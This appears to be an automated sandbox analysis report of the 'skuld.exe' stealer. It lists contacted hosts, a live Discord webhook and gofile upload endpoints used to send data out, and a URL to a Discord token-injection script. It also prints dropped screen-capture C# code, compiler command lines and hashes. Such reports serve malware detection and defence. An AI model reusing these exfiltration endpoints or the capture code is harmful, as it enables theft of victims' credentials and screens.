http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000000D.00000002.1594297796.000001CAE037D000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.gofile.io/getServerhttps://%s.gofile.io/uploadFilesql: | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://discord.com/api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0Sh | skuld.exe, SecurityHealthSystray.exe.0.dr | false | | high
https://www.amazon.com/ | skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp | false | | high
                                                                                                high
                                                                                                http://crl.micpowershell.exe, 0000000F.00000002.1773965348.000002704FFF6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://contoso.com/Iconpowershell.exe, 0000000F.00000002.1722464104.0000027047801000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://raw.githubusercontent.com/hackirby/discord-injection/main/injection.jsrangeskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                    high
                                                                                                    https://cdn.discordapp.com/attachments/1348329531148079104/1349316345950503014/Display_1.png?ex=67d2skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://go.dev/pkg/crypto/rsa#hdr-Minimum_key_size)b3312fa7e23ee7e4988e056be3f82d19181d9c6efe8141120skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                        high
                                                                                                        https://avatars.githubusercontent.com/u/145487845?v=4skuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brskuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.olx.pl/skuld.exe, 00000000.00000002.2728804738.000000C0000B0000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1594297796.000001CADF3F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://oneget.orgXXpowershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://crl.mpowershell.exe, 0000000F.00000002.1766382072.000002704FF15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://pesterbdd.com/images/Pester.pngPpowershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://bugzilla.moskuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00011A000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000002.2728804738.000000C00005C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.BoEX37k-iQhxskuld.exe, 00000000.00000003.1505649408.000000C000C8D000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://aka.ms/pscore68powershell.exe, 0000000D.00000002.1594297796.000001CADF1C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1593361861.0000027037791000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://avatars.githubusercontent.com/u/145487845?v=4sqlite:skuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                                            high
                                                                                                                            https://support.mozilla.orgskuld.exe, 00000000.00000003.1505649408.000000C000C7A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlPpowershell.exe, 0000000F.00000002.1593361861.00000270379B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://api.ipify.org/-DisableIOAVProtection-DisableScriptScanning%sskuld.exe, SecurityHealthSystray.exe.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://images-ext-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/htskuld.exe, 00000000.00000002.2728804738.000000C00012A000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://www.google.com/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://oneget.orgpowershell.exe, 0000000D.00000002.1594297796.000001CAE0929000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.baidu.com/skuld.exe, 00000000.00000002.2728804738.000000C00007C000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          high
IP               Domain          Country         ASN     ASN Name          Malicious
208.95.112.1     ip-api.com      United States   53334   TUT-ASUS          false
162.159.136.232  discord.com     United States   13335   CLOUDFLARENETUS   false
162.159.137.232  unknown         United States   13335   CLOUDFLARENETUS   false
51.91.7.6        api.gofile.io   France          16276   OVHFR             false
104.26.13.205    api.ipify.org   United States   13335   CLOUDFLARENETUS   false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1636046
Start date and time: 2025-03-12 10:39:55 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 43s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: skuld.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.expl.evad.winEXE@34/24@5/5
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
• Excluded IPs from analysis (whitelisted): 20.109.210.53, 13.107.253.72, 4.175.87.197
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size getting too big: too many NtCreateFile calls found.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
05:40:46  API Interceptor  6x Sleep call for process: WMIC.exe modified
05:40:50  API Interceptor  70x Sleep call for process: powershell.exe modified
                                                                                                                                          https://www.canva.com/design/DAGhb8U4chg/3aIOcMOYfXFvNu6pkMJtcA/view?utm_content=DAGhb8U4chg&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=he54ee766c5Get hashmaliciousInvisible JS, Tycoon2FABrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          Service.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Arly.exeGet hashmaliciousDiscord Token Stealer, PRYSMAX STEALER, RHADAMANTHYS, XmrigBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          T&S-WAN FUNG GMT FTY LTD (CW0007)-Statement as at 28 Feb 2025.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          https://www.livemap-loads.com/login/Get hashmaliciousNetSupport RAT, CAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          https://www.livemap-loads.com/login/Get hashmaliciousNetSupport RAT, CAPTCHA Scam ClickFixBrowse
                                                                                                                                          • 172.67.74.152
                                                                                                                                          Wire Remittance Detail.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          TcSzPgyAqC1WEJQ.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.12.205
                                                                                                                                          y27AF4qx0Q.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                          • 104.26.13.205
                                                                                                                                          api.gofile.ioDropper.exeGet hashmaliciousAsyncRAT, Trap Stealer, XWormBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NightFixed 1.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          send.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          VRChat_ERP_Setup 1.0.0.msiGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          VGjI0Z6AiG.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          windowsupdate.exe.bin.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          windowsupdate.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          NexoPack Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                          • 45.112.123.126
                                                                                                                                          Actionable_Insights_09970025e8865.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                          • 45.112.123.126
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENET (US) | MALZEME G_0017 TABANCA SPREY NOZUL.exe | malicious | Snake Keylogger | 104.21.112.1
  | RFQ- Italy.exe | malicious | DBatLoader, FormBook | 104.21.80.1
  | https://app.storylane.io/share/ttfgdirdpl74 | malicious | Invisible JS, Tycoon2FA | 104.16.4.189
  | Inv#8653763981_2sfgPaymentAdvice.svg | malicious | HTMLPhisher | 172.67.158.181
  | https://marktmagie.com/auth8523796254hfdhsf734/ogo00dex.html#uiptcgcu@uiprail.org | malicious | HTMLPhisher | 104.17.202.1
  | Shinhan_DocuSign_312047735687684052652423710713974466111628395562753690xqIDWOeXtHYBeNKrTAww.html | malicious | Unknown | 104.17.25.14
  | virus.7z | malicious | Unknown | 104.26.12.205
  | https://www.directhealthcaregroup.com | malicious | Unknown | 104.17.25.14
  | .svg | malicious | HTMLPhisher | 104.18.11.207
  | Transferencia 6997900002017937.exe | malicious | FormBook | 104.21.96.1
OVH (FR) | PURCHASE-ORDER-SINCOAUTOMATION-PO3223090781-Ref 6421SINCO-AUTOMATION.exe | malicious | FormBook | 5.196.134.71
  | 20250031011(12 Mar 2025).pdf.html | malicious | Unknown | 91.134.10.168
  | 20250031011(12 Mar 2025).pdf.html | malicious | Unknown | 91.134.82.79
  | https://cn11.web.id/Statement.pdf.Client.exe | malicious | ScreenConnect Tool | 51.79.157.177
  | https://cn11.web.id/E-Statment-PDF.html | malicious | ScreenConnect Tool | 51.79.157.177
  | VirusShare_6623297b20fa16eb42b992b6c55c53cd.exe | malicious | Sality | 37.187.202.101
  | https://site-xtxg5.powerappsportals.com/ | malicious | HTMLPhisher | 54.37.79.95
  | rustdesk-host=desk.connectoo.fr,key=X8QnRZLDi5KgVjdVTKCsUcepmvtWc6ZCP7CryF1bGjQ=,.exe | malicious | RUSTDESK | 5.196.204.83
  | rustdesk-host=desk.connectoo.fr,key=X8QnRZLDi5KgVjdVTKCsUcepmvtWc6ZCP7CryF1bGjQ=,.exe | malicious | RUSTDESK | 5.196.204.83
  | biopderfawd.exe | malicious | Xmrig | 54.37.137.114
TUT-AS (US) | SilverBullet. v1.1.4.exe | malicious | Python Stealer, Monster Stealer | 208.95.112.1
  | config.exe | malicious | XWorm | 208.95.112.1
  | XClient.exe | malicious | AsyncRAT, XWorm | 208.95.112.1
  | fTCzwFJhuy.exe | malicious | AgentTesla | 208.95.112.1
  | boyjhpskdfawd.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
  | KoaguarLoader.exe | malicious | Salat Stealer, XWorm | 208.95.112.1
  | 1776871603.exe | malicious | Clipboard Hijacker | 208.95.112.1
  | AWB_6654345699876T5332222345667.exe | malicious | AgentTesla | 208.95.112.1
  | XLUzlBAxvg.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 208.95.112.1
  | WAp70ZBSpL.exe | malicious | AgentTesla, DBatLoader, PureLog Stealer | 208.95.112.1
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):20940
                                                                                                                                          Entropy (8bit):5.606057975318633
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ACBrkxWdQ6tJpvHSXhr74YjHPnHfOUj7YIi03b7gXCGtGb5gqT:LrzQ6L4XhrsEPHfTj7b5ozGb+qT
                                                                                                                                          MD5:965659722359C9D2DF4A71A5F0DA07BC
                                                                                                                                          SHA1:5C37A659C55234DF84A441E4B4515BC4DB216310
                                                                                                                                          SHA-256:A1C2BE98920247E2A120EF87B4F077162F6362838745AE11CDBA69AD2AA452A2
                                                                                                                                          SHA-512:82D80E3C970905CE2415259F19AC73B2FF93E8ECAFAE60EA8233B3162930D3658F3B72406409EBC87ED2B9987D0FA2016E92D9E12FB94764DD98D196B6A8EF65
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:@...e...................{.s.........o.c...\..........@..........H...............o..b~.D.poM...H..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....}.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.k.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4a2, 9 symbols, created Wed Mar 12 10:51:19 2025, 1st section name ".debug$S"
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1352
                                                                                                                                          Entropy (8bit):4.01954325905695
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:H/i29c+beBQtXNeHGPYwKsVe2NII+ycuZhNOakSmPNnqSIEgd:ffiBQumPnKsQ2u1ulOa3aqSIP
                                                                                                                                          MD5:490091A699795F5E02501A6E4095E375
                                                                                                                                          SHA1:F3C42AD835DDDE34BF5EBA257B17348AE40D548A
                                                                                                                                          SHA-256:8C88D7AB14956527D681630124BB7D82765843B37EBA35DEF84F093BA9325CB1
                                                                                                                                          SHA-512:FA5B7BD116DB96C1AAA77C551129D83B4EB4D32764CC9155FB4734BB004650FE9C5EF3890912D532249DE1FEFE377135A274C4482037062CFF347E4CA7E9A873
                                                                                                                                          Malicious:false
Preview:L...'g.g.............debug$S........d...................@..B.rsrc$01........X.......H...........@..@.rsrc$02........P...R...............@..@........S....c:\Users\user\AppData\Local\Temp\dh1o0wbe\CSC88D051478A0408BB4BF8545E397BDC4.TMP.....................I&......T...........4.......C:\Users\user\AppData\Local\Temp\RESD9F3.tmp.-.<....................a..Microsoft (R) CVTRES.t.=..cwd.C:\Users\user\AppData\Local\Temp\vw7TwX1TN1.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t.
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Users\user\Desktop\skuld.exe
File Type:Zip archive data (empty)
Category:dropped
Size (bytes):22
Entropy (8bit):1.0476747992754052
Encrypted:false
SSDEEP:3:pjt/l:Nt
MD5:76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:false
Preview:PK....................
Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:MSVC .res
Category:dropped
Size (bytes):652
Entropy (8bit):3.0938230641660156
Encrypted:false
SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryQak7YnqqmPN5Dlq5J:+RI+ycuZhNOakSmPNnqX
MD5:1A00B217164926120A0AD7CB85DB54B0
SHA1:447526D60471F96AD462587F307C214C8B01846D
SHA-256:5887239F9DED413BBFF92F3AF5D50B2F599CA7FD8FDD50BC03D81D9CD83BD0A8
SHA-512:EF55B12B161867967DFC48F2BEB31B40AF76191C1B0B1B8394A0C5ABE1CAA911692CAB3DD5D5B919AB7DEF61C2B2A14EBFBEAE6BD341179CF62C3A8F3AECBC3C
Malicious:false
Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.h.1.o.0.w.b.e...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1004
Entropy (8bit):4.154581034278981
Encrypted:false
SSDEEP:24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:C76055A0388B713A1EABE16130684DC3
SHA1:EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:false
Preview:.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):607
                                                                                                                                          Entropy (8bit):5.319536918209162
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:p37Lvkmb6KOkqe1xBkrk+ik+SfZHGWZEaSfZHb:V3ka6KOkqeFk+e9XEae9b
                                                                                                                                          MD5:44CCA0AD55BFC17B701A9961B3671B45
                                                                                                                                          SHA1:7AE1438050D4708F64B34480B42551E282C552ED
                                                                                                                                          SHA-256:42EB69FBE696CA27543FBA9A022A8760105ADCA7B289BDDB2C6B3C653ECDE8B8
                                                                                                                                          SHA-512:35FD9103794D70022734328C88AB17F82271952637AFCC893544EC2AB4B2FE80049BEF59A7D4F9B20BA9036604BC886C205C2CB43775BEE39C7A30F7CBDDAD77
                                                                                                                                          Malicious:true
                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.0.cs"
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4096
                                                                                                                                          Entropy (8bit):3.159670599209851
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:6g7oEAtf0KhzBU/sLf6mtJlN0w4pW1ulOa3aq:0Nz0hmtOw+AK
                                                                                                                                          MD5:E648BD17F0FAF30CD15BC165695F7011
                                                                                                                                          SHA1:78CC146CD626885229BCC7A9C9D18BAD02B4625E
                                                                                                                                          SHA-256:2E1896DA41C60374D35D830A1893B6B0B30FA4ACE9D2E22ACD320F462F66E80C
                                                                                                                                          SHA-512:80A594FFA6CA9534FCA63D8E290657B711053620286755549E4E25C16BB860D5AB73164E4DB1DF2B3B38FBBDA64AF5591821A9FA730019579F1CC87DDE6EAF30
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...'g.g...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k....*...(....B.(j........9.Q...........{.........(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):1129
                                                                                                                                          Entropy (8bit):5.40450528637215
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:KLeaId3ka6KOkqeFk+e9XEae9aKax5DqBVKVrdFAMBJTH:Rakka6NkqeFkV9XER9aK2DcVKdBJj
                                                                                                                                          MD5:BCFE4783A3C59AF73E0C2AC999B550BD
                                                                                                                                          SHA1:26F4CEA94B87A7FB36DB78A7597F6B090CA32E2D
                                                                                                                                          SHA-256:5C15D25D64423612FD08AA1C5C16F20499657C962C87D7DA3D5A90F0DBE7734F
                                                                                                                                          SHA-512:49C29D932A0CD50804B541557DBC5AE16BF9729F8AD134803F800EA87BB0D4312DD790E2E6657F602A512D93DAC8F58370C7272FAEF2DB36CEFC341185A74D3F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:.C:\Users\user\AppData\Local\Temp\vw7TwX1TN1> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dh1o0wbe\dh1o0wbe.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):65008
                                                                                                                                          Entropy (8bit):7.605705552234734
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:JaNZMBFhfo/UBYibDgUjIkNod+oCBD/S9qX7AQ:JaNZOFhfYiYUjIkuuSqX7AQ
                                                                                                                                          MD5:271E61D9BF64F2DF4975FC187ED323EE
                                                                                                                                          SHA1:0292DB81171128BE63D259BFBB1C3F58583DC3FB
                                                                                                                                          SHA-256:C18E715E3B3B128463C654A157ED5E648E34FEBA3153CF5071E0709BF80E3A5E
                                                                                                                                          SHA-512:5A0C5358033705213B2C02FA4D147D0B9AB76C982665974EC3C80325FDBD4B34933A1755726898B2CFBAB8CFF97039DAEA1A5C843FF1B77C81BB8DE2A4D5528C
                                                                                                                                          Malicious:false
